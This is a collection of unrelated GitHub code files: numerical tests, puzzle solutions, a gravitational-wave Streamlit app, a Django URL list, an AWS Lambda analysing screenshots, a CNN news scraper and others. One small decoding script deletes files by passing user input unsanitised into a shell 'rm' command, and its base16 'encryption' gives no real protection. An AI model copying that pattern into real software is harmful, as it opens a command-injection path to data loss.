assert_allclose(np.asarray(xd), x)\n\n def test_log1p(self, x, xd):\n log1pnps = np.asarray(np.log1p(xd))\n log1pnp = np.log1p(x)\n assert_allclose(log1pnps, log1pnp)\n\n def test_sum(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n totald = np.sum(xd)\n total = np.sum(x)\n assert totald == pytest.approx(total)\n\n def test_sum_cols(self, x, xd):\n xd = np.sum(xd, axis=0)\n x = np.sum(x, axis=0)\n assert_allclose(np.asarray(xd), x)\n\n def test_sum_rows(self, x, xd):\n xd = np.sum(xd, axis=1)\n x = np.sum(x, 
axis=1)\n assert_allclose(np.asarray(xd), x)\n\n def test_mean(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n meand = np.mean(xd)\n mean = np.mean(x)\n assert meand == pytest.approx(mean)\n\n def test_mean_cols(self, x, xd):\n xd = np.mean(xd, axis=0)\n x = np.mean(x, axis=0)\n assert_allclose(np.asarray(xd), x)\n\n def test_mean_rows(self, x, xd):\n xd = np.mean(xd, axis=1)\n x = np.mean(x, axis=1)\n assert_allclose(np.asarray(xd), x)\n\n def test_var(self, x, xd):\n def var(x):\n mean = x.mean(axis=0)\n mean_sq = np.multiply(x, x).mean(axis=0)\n return mean_sq - mean ** 2\n\n varnps = np.asarray(var(xd))\n varnp = var(x)\n assert_allclose(varnps, varnp)\n\n def test_median(self, x, xd):\n mediand = np.median(xd) # implicitly converts to np.array\n median = np.median(x)\n assert mediand == pytest.approx(median)\n\n def test_write_zarr(self, x, xd_and_temp_store):\n xd, temp_store = xd_and_temp_store\n xd.to_zarr(temp_store, xd.chunks)\n # read back as zarr directly and check it is the same as x\n z = zarr.open(temp_store, mode=\"r\", shape=x.shape, dtype=x.dtype, chunks=(2, 5))\n arr = z[:]\n assert_allclose(arr, x)\n\n def test_write_zarr_ncopies(self, x, xd_and_temp_store):\n xd, temp_store = xd_and_temp_store\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n xd = xd._repartition_chunks((3, 5))\n ncopies = 3\n xd.to_zarr(temp_store, xd.chunks, ncopies=ncopies)\n # read back as zarr directly and check it is the same as x\n z = zarr.open(\n temp_store,\n mode=\"r\",\n shape=(x.shape[0] * ncopies, x.shape[1]),\n dtype=x.dtype,\n chunks=(1, 5),\n )\n arr = z[:]\n x_ncopies = np.vstack((x,) * ncopies)\n assert_allclose(arr, x_ncopies)\n\n def test_zeros(self, zeros):\n totals = np.sum(zeros, axis=0)\n x = np.array([0, 0, 0, 0, 0])\n assert_allclose(np.asarray(totals), x)\n\n def test_ones(self, ones):\n totals = np.sum(ones, axis=0)\n x = np.array([3, 3, 3, 3, 3])\n assert_allclose(np.asarray(totals), x)\n\n def test_asndarrays(self, x, xd):\n if not isinstance(xd, zappy.executor.array.ExecutorZappyArray):\n return\n xd1, xd2 = zappy.executor.asndarrays((xd + 1, xd + 2))\n assert_allclose(xd1, x + 1)\n assert_allclose(xd2, x + 2)\n","repo_name":"lasersonlab/zappy","sub_path":"tests/test_array.py","file_name":"test_array.py","file_ext":"py","file_size_in_byte":13964,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"2979671614","text":"'''By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n\nWhat is the 10 001st prime number?'''\n\ncnt=0\n#We are starting from 2 because 1 is neither a composite number nor a prime number\ni=1 #I am initializing it as 1 because when the loop will start running then the value of i increases by 1 and becomes 2 \nwhile cnt!=10001:\n i+=1\n flag=True\n for x in range(2,i//2+1):\n if i%x==0:\n flag=False\n break\n if flag:\n cnt=cnt+1\n \nprint(\"The 10001st prime number is \",i)","repo_name":"cricsion/ProjectEulerSolutions","sub_path":"Problem7.py","file_name":"Problem7.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33573211019","text":"#!/usr/bin/python3\n\n#homemade \nimport LISA_GB_configuration as myGB\nimport LISA_noise_configuration as NOISE\nimport utils\n#lisa\nfrom fastgb.fastgb import 
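# --- Editor's illustration (not part of the dataset records above) ---
# The Project Euler record above trial-divides every candidate by all numbers
# up to i//2. Checking divisors only up to sqrt(i) gives the same answer far
# faster, because any factor pair (a, b) with a*b = i has min(a, b) <= sqrt(i):
import math

def is_prime(n):
    if n < 2:
        return False
    for d in range(2, math.isqrt(n) + 1):
        if n % d == 0:
            return False
    return True

def nth_prime(k):
    count, i = 0, 1
    while count < k:
        i += 1
        if is_prime(i):
            count += 1
    return i

print(nth_prime(6))  # -> 13, matching the problem statement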
FastGB\nimport lisaorbits\nimport lisaconstants\n#display module\nimport matplotlib.pyplot as plt\nimport streamlit.components.v1 as components\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport streamlit as st\nfrom PIL import Image\n#common\nimport math as m\nimport numpy as np\nfrom scipy.interpolate import InterpolatedUnivariateSpline as spline\n\n\n\n#### main init\napptitle = 'FOM display facility'\nim = Image.open(\"images/lisa.ico\")\nst.set_page_config(page_title=apptitle,\n page_icon=im,\n layout=\"wide\")\n\n\n### data init\n# verification GB reader\ninput_gb_filename = \"data/VGB.npy\"\n\ngb_config_file = np.load(input_gb_filename)\nnb_of_sources = len(gb_config_file)\nGB_out = np.rec.fromarrays(\n [np.zeros((nb_of_sources, 1)),\n np.zeros((nb_of_sources, 1)),\n np.zeros((nb_of_sources, 1))],\n names=[\"freq\", \"sh\", \"snr\"]\n)\n\n\nlist_of_names = gb_config_file[\"Name\"]\n\nlist_of_names_opt = list_of_names\nlist_of_names_opt = np.append(\"select all\",list_of_names_opt)\n\n\n\n\nlist_of_sources = []\nlist_of_amplitude = []\n\n \n\nst.sidebar.header('Sources selection')\n\nlist_of_GB = st.sidebar.multiselect('Galactic Binaries', list_of_names_opt,placeholder='Select GB')\n\nif \"select all\" in list_of_GB:\n list_of_GB = list_of_names\n\n\nmission_duration = st.sidebar.slider('duration in year ?', min_value=1., max_value=10., step=0.5)\n\n#nb_of_GB = st.sidebar.slider('number of GB ?', min_value=0, max_value=max_nb_of_sources, step=1)\n\ntdi_type = st.sidebar.radio(\"select your TDI version\",\n [\"tdi1.5\",\"tdi2.0\"])#horizontal=True,)\n\nif tdi_type == \"tdi1.5\":\n tdi2 = False\nelif tdi_type == \"tdi2.0\":\n tdi2 = True\nelse:\n tdi2 = False\n\n\n#display mode\ndisplay_mode = st.sidebar.radio(\n \"select your display mode\",\n [\"x unified\",\"x\",\"closest\"])\n \n####### prepare the data\n#noise\ntest0 = NOISE.LISA_analytical_noise(\"dummy\", 42)\n\nfreq = np.logspace(-5, 0, 9990)\nduration = mission_duration # years\ntobs = duration * lisaconstants.SIDEREALYEAR_J2000DAY * 24 * 60 * 60\nlisa_orbits = lisaorbits.EqualArmlengthOrbits(dt=8640, size=(tobs + 10000) // 8640)\n# to control the +10000\n\n# noise psd\nSXX_noise_instru_only = test0.instru_noise_psd(freq, tdi2_=tdi2, option_=\"X\")\nSXX_confusion_noise_only = test0.confusion_noise_psd(freq, duration_=duration, tdi2_=tdi2, option_=\"X\")\nSXX_noise = SXX_noise_instru_only + SXX_confusion_noise_only\n\nSXY_noise_instru_only = test0.instru_noise_psd(freq, tdi2_=tdi2, option_=\"XY\")\nSXY_confusion_noise_only = test0.confusion_noise_psd(freq, duration_=duration, tdi2_=tdi2, option_=\"XY\")\nSXY_noise = SXY_noise_instru_only + SXX_confusion_noise_only\n\n\nSXX = spline(freq, SXX_noise)\nSXY = spline(freq, SXY_noise)\n\n# response\nR_ = utils.fast_response(freq, tdi2=tdi2)\nR = spline(freq, R_)\n# NOISE SENSITIVITY\nsh = spline(freq, SXX_noise_instru_only / R_)\nsh_wd = utils.psd2sh(freq, SXX_noise, sky_averaging=False, tdi2=tdi2)\n\n#signal\n\nGB = FastGB(delta_t=15, T=tobs, orbits=lisa_orbits, N=1024)\ndf = 1 / tobs\n\n\n\nfor j, s in enumerate(gb_config_file):\n\n pGW = dict(zip(gb_config_file.dtype.names, s))\n\n\n if pGW[\"Name\"] in list_of_GB:\n \n params = np.array( [pGW[\"Frequency\"],\n pGW[\"FrequencyDerivative\"],\n pGW[\"Amplitude\"],\n pGW[\"EclipticLatitude\"],\n pGW[\"EclipticLongitude\"],\n pGW[\"Polarization\"],\n pGW[\"Inclination\"],\n pGW[\"InitialPhase\"] ])\n \n source_tmp = myGB.LISA_GB_source(pGW[\"Name\"],params)\n list_of_sources.append(source_tmp)\n 
list_of_amplitude.append( source_tmp.get_source_parameters()[0][2]/(1e-23))\n\n X, Y, Z, kmin = GB.get_fd_tdixyz(source_tmp.get_source_parameters(), tdi2=True) \n X_f = df * np.arange(kmin, kmin + len(X.flatten()))\n \n h0 = np.sqrt(4 * df * float(np.sum(np.abs(X) ** 2 / R(X_f))))\n h0 *= np.sqrt(2)\n GB_out[\"sh\"][j] = h0**2\n GB_out[\"freq\"][j] = pGW[\"Frequency\"]\n\nlist_of_source = []\ntab_sensitivity, tab_waterfall = st.tabs([\"Sensitivity curve\", \"Waterfall plot\"])\n\n# st.error('Error message')\n# st.warning('Warning message')\n# st.info('Info message')\n# st.success('Success message')\n\n\n\n####### display the sensitivity curve\nvf= []\nvy = []\n\nfor vgb in GB_out:\n vf.append(float(vgb[\"freq\"]))\n vy.append(float(np.sqrt(vgb[\"freq\"] * vgb[\"sh\"])))\n\n## end of fake data\n\n# col1, col2 = st.columns([3,1])\n# col1.write('Figure')\n# col2.write('Buttons')\n\n\nfig = go.Figure()\n\ntmp = list_of_names.tolist()#list_of_GB\n\n\nfig.add_trace(go.Scatter(\n x=vf,\n y=vy,\n hovertext = tmp,\n #visible='legendonly',\n mode='markers',\n marker={'color':'red'},\n marker_symbol=\"hexagon\",\n name=\"GBs\",\n hovertemplate = \"%{hovertext}
f= %{x:.4f} Hz
h=%{y}\",\n))\n\nfig.add_trace(go.Scatter(\n x=freq,\n y=np.sqrt(freq) * np.sqrt(sh(freq)),\n name=\"Instrumental Noise\"\n))\n\n\nfig.add_trace(go.Scatter(\n x=freq,\n y=np.sqrt(freq) * np.sqrt(20 / 3) * np.sqrt(sh_wd(freq)),\n name=\"LISA Noise (Instru+Confusion)\"\n))\n\n\nfig.update_xaxes(title_text=\"Frequency (Hz)\", type=\"log\",showgrid=True,showexponent = 'all',exponentformat='e' )\nfig.update_yaxes(title_text=\"Characteristic Strain (TODO)\", type=\"log\",showgrid=True)\nfig.update_layout(xaxis=dict(range=[-5,0]))\nfig.update_layout(yaxis=dict(range=[-22,-15]))\nfig.update_layout(template=\"ggplot2\")\n\nfig.update_layout(hovermode=display_mode)\n\nfig.update_layout(legend=dict(orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n )\n )\n\nfig.update_layout(height=600, width=1000)# , grid= {'rows': 7, 'columns': 6})\ntab_sensitivity.plotly_chart(fig, theme=None, use_container_width=True)\n\n\n\nfig2 = go.Figure()\nfig2.add_trace(go.Scatter(\n x=freq,\n y=SXX_noise_instru_only,\n name=\"instru\"\n))\n\nfig2.add_trace(go.Scatter(\n x=freq,\n y=SXX_confusion_noise_only,\n #visible='legendonly',\n name=\"confusion\"\n))\n\nfig2.update_xaxes(title_text=\"Frequency (Hz)\",\n type=\"log\",showgrid=True,showexponent = 'all',exponentformat='e' )\nfig2.update_yaxes(title_text=\"Characteristic Strain (TODO)\", type=\"log\",showgrid=True)\ntab_sensitivity.plotly_chart(fig2, theme=None, use_container_width=True)\n","repo_name":"lemiere/FOM_streamlit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43550184303","text":"'''\n-*- coding: utf-8 -*-\n@Author : PlayerGuan\n@Time : 2020/11/26 16:12\n@File : run.py\n'''\n\n\nimport HTMLReport,unittest\nfrom setting.globalset import UiPath\nfrom tools.operation import Operation\n\n\nscreenshot_path = UiPath.screenshot_path\nreport_file = UiPath.report_path\nOperation().deleteAllFile(screenshot_path)\npath = Operation().makeFile(report_file)\n# create_cooke('prod')\nif __name__==\"__main__\":\n discover = unittest.defaultTestLoader.discover(UiPath.cases_path, pattern=\"test_*.py\", top_level_dir=None)\n runner = HTMLReport.TestRunner(\n report_file_name=\"report\",\n log_file_name=\"log\",\n output_path=path ,\n title= \"WebReport\",\n description= \"qiqiao\",\n thread_count=2,\n thread_start_wait= 5,\n sequential_execution=True,\n lang=\"cn\"\n )\n runner.run(discover)\n # Funcations().sendEmail(\"wangdongyi@do1.com.cn\",\"diaohuiyun@do1.com.cn\",\"wujianlun@do1.com.cn\",\"luolinyue@do1.com.cn\")","repo_name":"Donny2019/QiqiaoPlusAutoTest","sub_path":"ui/runner/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20419721714","text":"from watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\nfrom logger import logger\nimport argparse\n\nfrom plate import new_plate, search_plate\n\n\nclass FileCreateHandler(FileSystemEventHandler):\n \"\"\" watchdog for new car image \"\"\"\n def on_created(self, event):\n\n dir = str(event.src_path)\n\n if '.' in dir:\n name_file = event.src_path[::-1]\n x = len(name_file) - name_file.find(\"/\")\n name_file = event.src_path[x:]\n logger.info(f'NEW IMAGE! 
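# --- Editor's illustration (not part of the dataset records above) ---
# The hovertemplate string in the record above appears to have lost its plotly
# "<br>" line-break tags during extraction (they now render as raw newlines,
# which would be a syntax error in the original source). A minimal,
# self-contained version of the same per-point hover layout with the usual
# separators restored -- the restoration is an assumption based on plotly's
# hovertemplate conventions:
import plotly.graph_objects as go

fig = go.Figure(go.Scatter(
    x=[1e-3, 2e-3],
    y=[1e-20, 3e-20],
    hovertext=["GB-1", "GB-2"],
    mode="markers",
    hovertemplate="%{hovertext}<br>f= %{x:.4f} Hz<br>h=%{y}",
))
fig.update_xaxes(type="log")
fig.update_yaxes(type="log")
# fig.show()  # uncomment to render interactively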
{name_file}')\n\n logger.info(\"Created in: \" + event.src_path)\n search_plate(name_file, dir)\n\n else:\n logger.error(\"new file is directory !\")\n\n\nif __name__ == \"__main__\":\n\n event_handler = FileCreateHandler()\n\n \"\"\" create an observer. \"\"\"\n observer = Observer()\n\n \"\"\" attach the observer to the event handler. \"\"\"\n observer.schedule(event_handler, \"model/new_cars\", recursive=True)\n\n \"\"\" start the observer \"\"\"\n observer.start()\n\n try:\n while observer.is_alive():\n observer.join(1)\n finally:\n observer.stop()\n observer.join()\n","repo_name":"michal-broda/plate-detection","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10620581644","text":"class Solution:\n def getKthMagicNumber(self, k: int) -> int:\n if k < 2: return k\n i3 = i5 = i7 = 0\n\n dp = [1] * k \n for i in range(1, k):\n dp[i] = min(dp[i3] * 3, dp[i5] * 5, dp[i7] * 7)\n if dp[i] == dp[i3] * 3: i3 += 1\n if dp[i] == dp[i5] * 5: i5 += 1\n if dp[i] == dp[i7] * 7: i7 += 1\n\n return dp[-1]","repo_name":"Dawinia/LeetCode","sub_path":"interview/面试题 17.09. 第 k 个数.py","file_name":"面试题 17.09. 第 k 个数.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13035655443","text":"import pytest\n\nfrom bosdyn.api import lease_pb2, robot_command_pb2\nfrom bosdyn.api.graph_nav import graph_nav_pb2\nfrom bosdyn.client import lease\nfrom bosdyn.client.lease import LeaseWalletRequestProcessor\n\n\ndef test_get_lease_state():\n \"\"\"Check the LeaseWalletRequestProcessor.get_lease_state() method\"\"\"\n single_lease_unset_request = robot_command_pb2.RobotCommandRequest()\n single_lease_set_request = robot_command_pb2.RobotCommandRequest(lease=lease_pb2.Lease())\n no_lease_request = robot_command_pb2.RobotCommandFeedbackRequest()\n\n multi_lease, skip_mut = LeaseWalletRequestProcessor.get_lease_state(single_lease_unset_request)\n assert not multi_lease\n assert not skip_mut\n\n multi_lease, skip_mut = LeaseWalletRequestProcessor.get_lease_state(single_lease_set_request)\n assert not multi_lease\n assert skip_mut\n\n multi_lease, skip_mut = LeaseWalletRequestProcessor.get_lease_state(no_lease_request)\n assert multi_lease is None\n assert skip_mut\n\n\ndef test_resource_list():\n \"\"\"Test that using the resource list does the right thing.\"\"\"\n\n # Set up a lease wallet with an imaginary resource\n resource_name = 'test_resource'\n wallet = lease.LeaseWallet()\n wallet.client_name = 'test'\n lease_proto = lease.LeaseProto(resource=resource_name)\n lease_proto.sequence.append(1)\n lease_proto.client_names.append('root')\n lease_obj = lease.Lease(lease_proto)\n wallet.add(lease_obj)\n\n proc = LeaseWalletRequestProcessor(wallet, resource_list=(resource_name,))\n\n # Processor defaults to using our lease resource.\n request = graph_nav_pb2.NavigateToRequest()\n proc.mutate(request)\n\n assert len(request.leases) == 1\n assert request.leases[0].resource == resource_name\n assert request.leases[0].sequence == [1, 1]\n\n # Intentionally tell it that we *don't* want leases set.\n request = graph_nav_pb2.NavigateToRequest()\n proc.mutate(request, resource_list=())\n\n assert len(request.leases) == 0\n\n # Request a lease we don't have in the wallet.\n request = graph_nav_pb2.NavigateToRequest()\n with pytest.raises(lease.NoSuchLease):\n proc.mutate(request, 
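# --- Editor's illustration (not part of the dataset records above) ---
# getKthMagicNumber in the record above is the classic three-pointer DP: every
# "magic" number is 3, 5 or 7 times a smaller one, so one index per factor
# tracks which earlier value has not yet been multiplied by it. A generalised
# sketch for an arbitrary factor set (0-indexed here, unlike the record):
def kth_smooth_number(k, factors=(3, 5, 7)):
    dp = [1]
    idx = [0] * len(factors)
    while len(dp) < k + 1:
        candidates = [dp[idx[i]] * f for i, f in enumerate(factors)]
        nxt = min(candidates)
        dp.append(nxt)
        for i, c in enumerate(candidates):
            if c == nxt:
                idx[i] += 1  # advance every pointer that produced nxt, avoiding duplicates
    return dp[k]

assert [kth_smooth_number(k) for k in range(6)] == [1, 3, 5, 7, 9, 15]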
resource_list=('body',))\n\n # Explicit lease overrides resource_list\n request = graph_nav_pb2.NavigateToRequest()\n request.leases.add().CopyFrom(lease_proto)\n proc.mutate(request, resource_list=('body',))\n\n assert len(request.leases) == 1\n assert request.leases[0] == lease_proto\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/tests/test_lease_processor.py","file_name":"test_lease_processor.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"28527007807","text":"# !/usr/bin/env python3\r\n# program untuk dekripsi file\r\n# dibuat oleh rofi\r\n\r\nimport base64, os\r\nfrom base64 import b16decode\r\n\r\ndef dekripsi_nama_file(nama_file):\r\n nama_file_enkripsi = nama_file.encode()\r\n nama_file_bytes = b16decode(nama_file_enkripsi)\r\n nama_file_asli = nama_file_bytes.decode()\r\n return nama_file_asli\r\n\r\ndef dekripsi_file(file_enkripsi):\r\n file_enkripsi_bytes = b16decode(file_enkripsi)\r\n return file_enkripsi_bytes\r\n\r\nfile = input(\"\\nmasukan file yang mau didekripsi : \")\r\n\r\npemisah_extensions = os.path.splitext(file)\r\nhapus_extensions_encrypt = pemisah_extensions[0]\r\nnama_file_asli = dekripsi_nama_file(hapus_extensions_encrypt)\r\n\r\nwith open(file, \"rb\") as file_enkripsi:\r\n isi_file_enkripsi = file_enkripsi.read()\r\n \r\nwith open(nama_file_asli, \"wb\") as file_dekripsi:\r\n file_dekripsi.write(dekripsi_file(isi_file_enkripsi))\r\n file_dekripsi.close()\r\n os.system(f\"rm {file}\")\r\n print(\"file berhasil didekrisi\\n\")\r\n exit()\r\n","repo_name":"rofid0ank/EDB16","sub_path":"main/dekripsi.py","file_name":"dekripsi.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39340011566","text":"from collections import defaultdict\nimport sys\n\nmax_node = float(\"inf\")\noutput_fname =\"wiki_adj_list.txt\"\nif len(sys.argv) == 2:\n max_node = int(sys.argv[1])\n output_fname = \"wiki_adj_list_\"+str(max_node)+\".txt\"\n\nadj_list = defaultdict(list)\nwith open (\"wiki_talk.txt\") as fin:\n for l in fin:\n if l[0] == \"#\":\n continue\n (s, t) = l.split(\"\\t\")\n t = t[:-1] # trim off newline\n if int(s) < max_node and int(t) < max_node:\n adj_list[s].append(t)\n\nwith open (output_fname, \"w\") as fout:\n for e in adj_list.keys():\n fout.write(e + \" \" + \" \".join(adj_list[e]) + \"\\n\")\n","repo_name":"yiming-fang/Hascade","sub_path":"data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37592442301","text":"from django.urls import path\n\nfrom new_app import views\n\nurlpatterns = [\n\n path(\"\", views.index, name=\"index\"),\n path(\"dash\", views.dash, name=\"dash\"),\n path(\"login_page\", views.login_page, name=\"login_page\"),\n\n path(\"adminbase\", views.adminbase, name=\"adminbase\"),\n\n path(\"studentbase\", views.studentbase, name=\"studentbase\"),\n path(\"students_data\", views.students_data, name=\"students_data\"),\n path(\"students_data_view\", views.students_data_view, name=\"students_data_view\"),\n path(\"complaint\", views.complaint, name=\"complaint\"),\n path(\"view_complaint\", views.view_complaint, name=\"view_complaint\"),\n path(\"view\", views.view, name=\"view\"),\n path(\"reply_complaint//\", views.reply_complaint, name=\"reply_complaint\"),\n 
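# --- Editor's illustration (not part of the dataset records above) ---
# preprocess.py above accumulates a directed adjacency list with
# collections.defaultdict(list), so unseen source nodes need no explicit
# initialisation. The same pattern on in-memory edges instead of
# wiki_talk.txt (the edge data below is made up for the demo):
from collections import defaultdict

edges = [("0", "1"), ("0", "2"), ("1", "2"), ("3", "0")]
max_node = 3  # keep only nodes below this id, as in the script

adj_list = defaultdict(list)
for s, t in edges:
    if int(s) < max_node and int(t) < max_node:
        adj_list[s].append(t)

for node, neighbours in adj_list.items():
    print(node, " ".join(neighbours))  # same "src dst dst ..." line format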
path(\"delete_data//\", views.delete_data, name=\"delete_data\"),\n path(\"delete_complaint//\", views.delete_complaint, name=\"delete_complaint\"),\n path(\"notification\", views.notification, name=\"notification\"),\n path(\"view_notification\", views.view_notification, name=\"view_notification\"),\n path(\"student_notification\", views.student_notification, name=\"student_notification\"),\n path(\"reply_notification//\", views.reply_notification, name=\"reply_notification\"),\n\n path(\"student_register\", views.student_register, name=\"student_register\"),\n path(\"logout_view\", views.logout_view, name=\"logout_view\"),\n\n]","repo_name":"afnaaffz/Task-Student","sub_path":"new_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40824571322","text":"import sys\nsys.path.append(\"/opt/\")\nimport boto3\nimport os\nimport sys\nimport uuid\nimport urllib.parse\nimport json\nfrom PIL import Image\nimport PIL.Image\n\nrekognition_client = boto3.client('rekognition', region_name='us-east-1')\ndynamodb = boto3.resource('dynamodb')\ns3 = boto3.client('s3')\n\ndef top(image_path, saved_location):\n with Image.open(image_path) as image_obj:\n width, height = image_obj.size\n cropped_image = image_obj.crop((width - 200, 0, width, 200))\n cropped_image.save(saved_location)\n\n\ndef save_to_dyanmodb(student_id:str, task:str, key:str, suffix:str, data):\n id = f\"{student_id}-{task}-{suffix}\"\n item ={\"id\": id, key: json.dumps(data)}\n table = dynamodb.Table(os.environ['LabDataTable'])\n db_response = table.put_item(\n Item=item\n )\n id = f\"{student_id}-{task}\"\n item ={\"id\": id, key: json.dumps(data)}\n db_response = table.put_item(\n Item=item\n )\n \ndef lambda_handler(event, context):\n if os.environ['AnalysisScreenShot'] == \"false\":\n print(\"AnalysisScreenShot Disabled!\")\n return \n \n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n key = urllib.parse.unquote(key)\n\n segment = key.split(\"/\")\n student_id =segment[5].split(\"=\")[1]\n year = segment[1].split(\"=\")[1]\n month = segment[2].split(\"=\")[1]\n day = segment[3].split(\"=\")[1]\n hour = segment[4].split(\"=\")[1]\n minuite = segment[6].split(\"_\")[1]\n suffix = f\"{year}/{month}/{day}/{hour}/{minuite}\"\n \n download_path = '/tmp/{}.jpeg'.format(uuid.uuid4())\n s3.download_file(bucket, key, download_path)\n \n top(download_path, '/tmp/cropped.jpg')\n \n with open('/tmp/cropped.jpg', 'rb') as image:\n response = rekognition_client.detect_text(Image={'Bytes': image.read()})\n detected_text = response['TextDetections']\n with open(download_path, 'rb') as image:\n response = rekognition_client.detect_moderation_labels(Image={'Bytes': image.read()})\n moderation_labels = response['ModerationLabels']\n with open(download_path, 'rb') as image:\n response = rekognition_client.recognize_celebrities(Image={'Bytes': image.read()})\n celebrities = response['CelebrityFaces']\n\n print(detected_text)\n print(moderation_labels)\n print(celebrities)\n save_to_dyanmodb(student_id, \"TextDetections\", \"DetectedText\", suffix, detected_text)\n save_to_dyanmodb(student_id, \"ModerationLabels\", \"ModerationLabels\", suffix, moderation_labels)\n save_to_dyanmodb(student_id, \"CelebrityFaces\", \"CelebrityFaces\", suffix, celebrities)\n \n copy_source = {\n 'Bucket': bucket,\n 'Key': key\n }\n \n s3.copy_object( CopySource=copy_source,\n 
Bucket=os.environ['StudentMarkingBucket'],\n Key=f\"Screenshot/{student_id}.jpeg\",\n MetadataDirective='REPLACE',\n ContentType='image/jpeg')\n\n print(\"PutItem and copy object succeeded!\")\n \n \n","repo_name":"wongcyrus/labmonitor_collector","sub_path":"lambda_function/process_screenshot_function.py","file_name":"process_screenshot_function.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18869541904","text":"import scrapy\nfrom scrapy.crawler import CrawlerRunner\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date, time, datetime, timedelta\nfrom scrapy.utils.project import get_project_settings\nfrom scrapy.utils.log import configure_logging\nfrom twisted.internet import reactor\n\n\nclass en_CNNSpider_spider(scrapy.Spider):\n name = 'en_CNN'\n allowed_domains = ['cnn.com']\n start_urls = []\n\n def __init__(self, start_date, end_date):\n self.start_date = start_date\n self.end_date = end_date\n self.start_time = datetime.combine(start_date, time())\n self.end_time = datetime.combine(end_date, time())\n\n start = self.start_time.replace(day=1)\n\n while start <= self.end_time:\n year = str(start.year)\n month = str(start.month)\n self.start_urls.append(f'https://edition.cnn.com/article/sitemap-{year}-{month}.html')\n start += relativedelta(months=1)\n\n\n def parse(self, response):\n\n articles = response.xpath('//div[@class=\"sitemap-entry\"]/ul/li')\n for article in articles:\n\n date_time_str = article.xpath('./span[@class=\"date\"]/text()').get()\n date_time = datetime.strptime(date_time_str, \"%Y-%m-%d\")\n \n if date_time < self.start_time:\n return\n elif date_time >= self.end_time:\n continue\n\n date = str(date_time.date())\n title = article.xpath('./span[@class=\"sitemap-link\"]/a/text()').get()\n url=response.urljoin(article.xpath(\".//@href\").get())\n\n yield scrapy.Request(url=url,\n callback=self.parse_article,\n cb_kwargs={\"date\": date, \"title\": title})\n\n\n def parse_article(self, response, *args, **kwargs):\n date = kwargs[\"date\"]\n title = kwargs[\"title\"]\n\n text_nodes = response.xpath('//div[@class=\"article__content\"]/p[@class=\"paragraph inline-placeholder\"]')\n texts=[''.join(text_node.xpath(\".//text()\").getall()).replace('\\n', \" \") for text_node in text_nodes if not text_node.xpath('.//script')]\n text = \"\\n\".join([t.strip() for t in texts if t.strip()]).replace(u'\\xa0', \" \").replace(u'\\u3000', \" \")\n if text and title:\n yield {\"date\": date,\n \"source\": self.name,\n \"title\": title.strip(),\n \"text\": text.strip()}\n\n\n def warn_on_generator_with_return_value_stub(spider, callable):\n pass\n scrapy.utils.misc.warn_on_generator_with_return_value = warn_on_generator_with_return_value_stub\n scrapy.core.scraper.warn_on_generator_with_return_value = warn_on_generator_with_return_value_stub\n\n","repo_name":"zouxunlong/web_crawl","sub_path":"web_crawl/spiders/en_CNN_spider.py","file_name":"en_CNN_spider.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4763690314","text":"#!/usr/bin/python\n# encoding:utf-8\n\n\"\"\"\n@author:jiat\n@contact:cctvjiatao@163.com\n@file:homework15.py\n@time:2018/5/6 12:26\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport numpy as 
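# --- Editor's illustration (not part of the dataset records above) ---
# The Lambda above crops the top-right 200x200 corner of each screenshot
# before running text detection; PIL's crop box is (left, upper, right, lower)
# in pixels, so the corner is anchored off the image width. A self-contained
# sketch with a generated image instead of an S3 download (the helper name is
# illustrative):
from PIL import Image

def crop_top_right(image, size=200):
    width, height = image.size
    size = min(size, width, height)  # guard against images smaller than the corner
    return image.crop((width - size, 0, width, size))

img = Image.new("RGB", (640, 480), "navy")
corner = crop_top_right(img)
print(corner.size)  # -> (200, 200)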
